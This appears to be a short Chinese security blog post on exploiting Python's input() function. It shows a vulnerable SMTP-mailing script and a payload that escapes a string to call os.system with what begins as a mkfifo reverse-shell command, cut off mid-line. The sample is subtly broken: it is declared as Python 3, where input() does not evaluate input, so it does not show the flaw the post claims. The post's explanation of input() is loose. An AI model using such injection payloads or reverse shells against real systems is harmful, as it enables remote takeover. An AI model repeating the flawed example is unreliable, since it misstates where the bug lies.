Python输入漏洞利用(Python input漏洞)

本文探讨了Python中input函数导致的安全漏洞,介绍了背景条件,包括程序使用input或raw_input函数来获取用户输入。示例代码展示了一段易受攻击的SMTP邮件发送脚本,其中用户输入未经验证直接用于发送邮件。文章还提到了Payload示例,如利用漏洞获取反弹shell,并阐述了如何构造这样的攻击payload。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

背景条件

  1. 源码为python编写的程序
  2. 该程序包含input函数,利用用户或自动化输入获取参数进行下一步

漏洞函数

  • input():接收用户输入且不修改输入的类型
  • raw_input():接收用户输入并强制修改为字符串类型

漏洞源码示例

#!/usr/bin/python3
#-*- coding: utf-8 -*-
 
import smtplib
 
address = '[email protected]'
data = str(input('report: '))
print('[+] sending the message: ' + str(data))
 
try:
    server = smtplib.SMTP("beerpwn.it", None, None)
    server.sendmail("local@bottleneck", address, str(data))
    server.close()
except Exception as e:
    pass

Payload

../etc/passwd' and __import__("os").system("rm /tmp/f;mkf

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨痕诉清风

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值